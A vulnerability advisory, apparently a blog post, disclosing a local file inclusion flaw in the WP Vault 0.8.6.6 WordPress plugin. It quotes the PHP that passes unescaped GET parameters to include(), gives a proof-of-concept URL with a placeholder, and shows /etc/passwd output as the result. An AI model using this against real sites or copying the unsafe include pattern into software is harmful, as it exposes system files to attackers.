WP Vault 0.8.6.6 – Local File Inclusion

Homepage:

https://wordpress.org/plugins/wp-vault/

Description:

Type user access: any user.

$_GET[“wpv-image”] is not escaped in include file.

File / Code:

Path: /wp-content/plugins/wp-vault/trunk/wp-vault.php

Line: 228

include(dirname(__FILE__) . "/images/" . $_GET["wpv-image"]);


if (isset($_GET["wpv_file_id"])) {
    include(dirname(__FILE__) . "/wpv-file-handler.php");
    exit;
}
else if (isset($_POST["wpv-tooltip"])) {
    include(dirname(__FILE__) . "/ajax-response/wpv-tooltip.php");
    exit;
}
else if (isset($_GET["wpv-image"])) {
    include(dirname(__FILE__) . "/images/" . $_GET["wpv-image"]);
    exit;
}
else if (isset($_GET["wpv-css"])) {
    if (file_exists(dirname(__FILE__) . "/css/" . $_GET["wpv-css"] . ".css")) {
        header("Content-type: text/css");
        include(dirname(__FILE__) . "/css/" . $_GET["wpv-css"] . ".css");
        exit;
    }
    else if (file_exists(dirname(__FILE__) . "/css/" . $_GET["wpv-css"] . ".css.php")) {
        header("Content-type: text/css");
        include(dirname(__FILE__) . "/css/" . $_GET["wpv-css"] . ".css.php");
        exit;
    }
}

Proof of Concept:

http://Target/?wpv-image=[LFI]

Result:

Print file, example, sensible files:

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin

Timeline:

  • 28/11/2016 – Discovered
  • 28/11/2016 – Vendor not found

One comment

Leave a Reply

Your email address will not be published. Required fields are marked *

Back to Top